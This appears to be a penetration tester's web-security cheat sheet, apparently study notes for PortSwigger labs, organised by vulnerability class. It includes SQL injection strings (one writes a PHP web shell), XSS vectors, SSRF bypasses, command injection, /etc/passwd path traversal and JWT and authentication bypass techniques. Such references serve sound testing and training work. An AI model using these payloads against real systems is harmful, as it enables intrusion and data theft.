Cheat Sheet

• Database
  • SQLi
  • NoSQLi
• HTML, JS, Browser
  • XSS
  • DOM
  • Prototype Pollution
  • CSRF
  • CORS
  • Websocket
• Server Side
  • XXE
  • SSRF
  • OS Command Injection
  • SSTI
  • Code Injection
  • Deserialization
• API Testing
  • Access Control
  • API Testing
  • Business logic
  • GraphQL
  • File Upload
  • LLM
• Auth
  • Authentication
  • OAuth
  • JWT
• Basic
  • Path Traversal
  • Information Disclosure
• HTTP
  • Host
  • Web Cache Poisoning
  • Web Cache Deception
  • Race Conditions
  • HTTP Request Smuggling

SQL Injection

Cheat Sheet

https://portswigger.net/web-security/sql-injection/cheat-sheet

Recon

• '
• ' OR 1=1#
• ' OR '1'='1
• " OR "1"="1"-- 123
• " OR "1"="1" LIMIT 1#

UNION Based

• ' UNION SELECT NULL#
• ' UNION SELECT NULL FROM dual--
• ' UNION SELECT 1, 'string'#
  • Real World Example 1
• ' UNION SELECT '<?php $host = "localhost"; system($_GET["cmd"]); ?>' INTO OUTFILE 'D:/xampp/htdocs/shell.php'
  • Real World Example 1

Stacked Queries

• ';SELECT 1/name FROM sysobjects WHERE xtype LIKE 'U' AND name BETWEEN 'A' AND 'AZ'
  • Real World Example 1

Error Based

• '
• ' OR CAST((SELECT username FROM users LIMIT 1) AS boolean)--
• ExtractValue and CONCAT
  • Real World Example 1
  • Real World Example 2
  • Real World Example 3
• UpdateXML and CONCAT
  • Real World Example 1
• ' AND 1 = CONVERT(int,@@version)--123
  • Real World Example 1
  • Real World Example 2
• ' AND 1 = CONVERT(int,(SELECT table_name FROM information_schema.tables FOR XML PATH('')))--
  • Real World Example 1
• ';SELECT 1/name FROM sysobjects WHERE xtype LIKE 'U' AND name BETWEEN 'A' AND 'AZ'
  • Real World Example 1

Boolean Based

• ' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)=20) = 'a

Blind

• time delays
• DNS Lookup

Bypass Skill

• white space not allowed => /**/, %20, +, \t
• (, ), =, >, <, . not allowed
• CRLF Injection: \r\n, %0d%0a
• Char()

NoSQL injection

• '||'1'=='1
• %00 as terminator
• operator injection
  • Document
  • Inject
  • extract data
  • Exfiltrating data using operators
  • 1: bypass authentication
  • 2: extract unknown fields
• Boolean Based
  • extract data via ' && '1' === '1
  • Identifying field names

XSS

Basic Payloads

• <script>alert(1)
• <script>alert(1)</script>
• <SCRIpt>alert(1)</scriPT>
• "/><script>alert(1)</script>
• <img src=x onerror=alert(1)>
• javascript:alert(1)
• 123" autofocus onfocus="alert(0)" data-type="456
• <di onfocus="alert(document.cookie)" tabindex="0" autofocus></di>
• ';alert(1);var a = '3
• <svg><animateTransform onbegin="alert(1)" attributeName="transform" dur="0.1s" /></svg>
• 'accesskey='x'onclick='alert(1)
• <svg><a><animate attributeName="href" values="javascript:alert(1)" /><text x=20 y=20>Click me</text></a></svg>
• (, ), {, } and ; are blocked

AngularJS

• {{ constructor.constructor('alert("XSS")')() }}
• AngularJS 1
• AngularJS 2

DOM-based vulnerabilities

• DOM clobbering via window.vulnerableKey
• Clobbering DOM attributes

Prototype Pollution

Concept

• sink, gadget

Tools

• DOM Invader

Recon

• script.src = data:text/javascript,alert(1)
• eval
• sanitize non-recursively => ____proto__proto__
• Detecting server-side prototype pollution via polluted property reflection
• SSTI
  • {__proto__:{isAdmin:true}}
  • content-type: "application/json; charset=utf-7
  • constructor.prototype
  • RCE via execArgv

CSRF

Prerequisite

• Simple Request (HTML <form>, <img>, <iframe> 可發出的請求)

Recon

• CSRF Token Bypass
  • GET Method Bypass CSRF Token
  • Strip csrf: string
  • CSRF token is not tied to user session
• CSRF Token + CRLF Injection Bypass
  • Control Set-Cookie via CSRF Injection
  • Double Submit
• SameSite Bypass
  • SameSite Lax bypass via method override
  • SameSite Strict bypass via client-side redirect
  • SameSite Strict bypass via 30x redirect
  • SameSite Strict bypass via sibling domain Reflected XSS
  • SameSite Lax bypass via 2 mins cookie
• Referer Bypass
  • Strip Referer Header using <meta name="referrer" content="never" />
  • Broken Referer validation using referer.contains('vulnerable-website.com')

CORS

• Origin Reflection
• null Origin Bypass

WebSocket

• XSS
  • 1
  • 2
• Cross-site WebSocket hijacking

XXE

• XXE leads to LFI
• XXE leads to SSRF
• XInclude leads to LFI
• XXE via SVG Image Upload
• Blind XXE via External DTD
• XXE via Error Msg

SSRF

Recon

• SSRF to localhost
• Bypass 黑名單
  • Decimal: http://2130706433
  • Octal: http://017700000001
  • Short form: http://127.1
  • Full URL encoding:http://%31%32%37%2e%30%2e%30%2e%31
  • Hex: http://0x7f.0.0.1
  • Partial URL encoding: http://%3127.0.0.1
• Bypass 白名單
  • URL Encode Fragment: http://localhost%23@vulnerable-website.com
  • Double URL Encode With username:password: http://localhost:80%2523@vulnerable-website.com
• SSRF via Open Redirect
• Flawed Logic via String.startsWith:
  • http://vulnerable-website.com.hackingwithpentesterlab.link
  • https://whatever-hostname.hackingwithpentesterlab.link

Tools

• URL Encode All Characters

function encodeSingleStringToURIComponent(str) {
  return "%" + str.charCodeAt(0).toString(16);
}

• String to Hex

OS command injection

Useful commands

https://portswigger.net/web-security/os-command-injection#useful-commands

Recon

• 1 & echo whoami &
• & ping -c 10 127.0.0.1 &
• & whoami > /var/www/images/whoami.txt &
• Ways of injecting OS commands

Server-side template injection

• ${{<%[%'"}}%\
• Ruby ERB
• Python tornado
• Apache FreeMarker
• Handlebars.js
• Python Django
• Apache FreeMarker (EXPERT)
• PHP Twig (EXPERT)

Code Injection

• inject ', ", }, ;, $, #, ;ls;, |ls
• string concat: ., +
• comment out: #, //, ;//
• execute code:

eval('ls')
exec('ls')
system('ls')
`uname`

Deserialization

Tools

• PHP Generic Gadget Chains
• Java, Maven, ysoserial

Recon

• PHP 7.x 0 == "string"
• Source Code Access + PHP
  • 1
  • 2
  • 3 (EXPERT)
• Exploiting Java deserialization with Apache Commons
• Universal Deserialisation Gadget for Ruby 2.x-3.x
• Source Code Access + Java

Access control

• /robots.txt
• Reuqest Param
  • Cookie: admin=true
  • ?role=1
  • roleid=2
• X-Original-URL
• Casing, File Extension, Trailing Slash
• 30x With Sensitive Data
• IDOR
  • ?id=administrator
  • ?userId=1
• Referer Based

API testing

• Find /api Document
• Try Different HTTP Request Methods
• Mass assignment
• server-side parameter pollution in a query string
  • How to construct
  • 1
• server-side parameter pollution in a REST URL (EXPERT)

Business logic vulnerabilities

• 加入購物車 price
• 加入購物車 qty 負數
• 加入購物車 qty Integer overflow
• padding@vulnerable-website.com.attacker-website.com
• privilege escalation via update userInfo
• Insufficient workflow validation
  • 1
  • 2
• 兩張折價券交替使用
• encryption oracle
• email address parsing discrepancies (EXPERT)

GraphQL API

• Common endpoint names
• Running a full introspection query
  • Document
  • 1
  • 2
• Bypassing GraphQL introspection defenses
  • Document
  • 1
• Multi query

File upload

Tools

• exiftool

Recon

• Web Shell Upload
  • Content-Type bypass
  • Path traversal
  • .htaccess
  • obfuscated file extension
  • polyglot
  • race condition (EXPERT)

Web LLM attacks

• 請問你有哪些 API 可以使用？
• Indirect prompt injection
• insecure output handling

Authentication

• Username/Password enumeration
  • via different responses
  • via subtly different responses
  • via response timing
  • X-Forwarded-For
  • Success Login can reset counter
  • via account lock
  • multiple credentials per request
  • via stay-logged-in cookie
  • via password change
• Brute-Force verification code
• Password reset using victim's username
• Password reset poison via X-Forward-Host
• Case insensitive: "admin" vs "Admin"
• Space allowed: "admin" vs "admin "

OAuth

• token not bind to user
• profile linking CSRF (no state param)
• OAuth account hijacking via redirect_uri
• OAuth account hijacking via Open Redirect
• SSRF via OpenID dynamic client registration

JWT

Tools

hashcat

Recon

• unverified signature
• "alg":"none" or "alg": "None"
• Brute-forcing secret keys using hashcat
  • Document
  • 1
• header injection
  • Document
  • jwk
  • jwk Lab
  • jku
  • jku Lab
  • kid
  • kid Lab
• algorithm confusion
  • 1 (EXPERT)
  • 2 (EXPERT)

Path traversal

• Basic: ../../../etc/passwd
• Strip non-recursively
• URL Encode
  • Partial URL Encode: ..%2F..%2F..%2Fetc%2Fpasswd
  • URL Encode: %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
  • Double URL Encode: %252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
• Start Path: /var/www/images/../../../etc/passwd
• Null Byte: ../../../etc/passwd%00.jpg
• /etc/./passwd
• /etc/../etc/passwd
• /etc/../ETC/passwd
• /pentesterlab;pentesterlab
• Windows: non-exist-dir/../../../file.txt

Information disclosure

• Fingerprint (Response Headers, 404 Page, Malformed Request)
• Error Message
• Debug Page
• /robots.txt
• HTTP TRACE
• HTML comment, JS Links, API & Secret Key, Source Map
• ffuf, nmap http-enum

HTTP Host header attacks

• Supply an arbitrary Host header
  • Port
  • Subdomain
  • Double Host headers
  • Absolute URL
  • Indent
  • Custom Header
  • SQLi Payload
  • malformed request line
• Web Cache Posioning
• authentication bypass
• virtual host brute-forcing
• Routing-based SSRF
  • Document
  • 1
  • 2
• Connection state attacks
  • Document
  • 1
• SSRF via a malformed request line
  • Document
  • 1
• Password reset poisoning
  • 1
  • 2

Web cache poisoning

• unkeyed input
  • Header: X-Forwarded-Host
  • Header: X-Forwarded-Host + DOM Based XSS (EXPERT)
  • Cookie
  • Headers: X-Forwarded-Host + X-Forwarded-Scheme
  • Headers: X-host + Vary: User-Agent
  • Headers: X-Forwarded-Host + X-Original-URL (EXPERT)
  • QueryString
  • utm_content
  • GET request with body
• Pragma: akamai-x-get-cache-key, Pragma: x-get-cache-key
• Path normalization
• Parameter cloaking
  • ?a=1?b=2
  • ?a=1;b=2
• URL normalization
  • Document
  • 1
• Cache Key Injection
  • Document
  • 1 (EXPERT)
• Internal cache poisoning (EXPERT)

Web cache deception

• Path mapping discrepancies: /user/1 vs /user/1/style.css
  • Document
  • 1
• Delimiter discrepancies: /profile vs /profile;foo.css
  • Document
  • 1
• Delimiter decoding discrepancies: /profile vs /profile%23style.css
• Normalization discrepancies
  • Document
  • by the origin server
  • 1
  • by the cache server (1)
  • by the cache server (2)
  • 1
• exact-match cache rules (EXPERT)

Race conditions

• TOCTOU
  • CWE-367: Time-of-check Time-of-use (TOCTOU) Race Condition
  • 1
  • 2
• 加車 + 結帳
• todo-yus
• Partial construction (EXPERT)
• time-sensitive

HTTP request smuggling

Note

• Use CL.TE First
• Real World Situation

Recon

• HTTP/1.1
  • CL.TE
    • Document
    • CL.TE (1)
    • CL.TE (2)
    • CL.TE (3) bypass front-end security controls
  • TE.CL
    • Document
    • TE.CL (1)
    • TE.CL (2)
    • TE.CL (3) bypass front-end security controls
  • TE.TE (obfuscating the TE header)
  • 0.CL (EXPERT)
  • Browser-powered
    • CL.0
      • Document
      • 1
    • client side desync
      • Document
      • 1 (EXPERT)
    • Server-side pause-based desync
      • Document
      • 1 (EXPERT)
• HTTP/2
  • H2.CL + Web Cache Poisoning
  • H2.CL + CRLF Injection
  • H2.TE
  • Response queue poisoning
  • H2.TE + Response queue poisoning
  • request splitting
  • request splitting + CRLF Injection
  • request tunnelling
    • Document
    • Leaking internal headers
    • Blind
    • Non-blind request using HEAD
    • Bypassing access controls (EXPERT)
    • Web cache poisoning (EXPERT)
• Revealing front-end request rewriting
  • Document
  • 1
• Capturing other users' requests
  • Document
  • 1
• User Agent Reflected XSS
• Web Cache Poisoning (EXPERT)
• Web Cache Deception (EXPERT)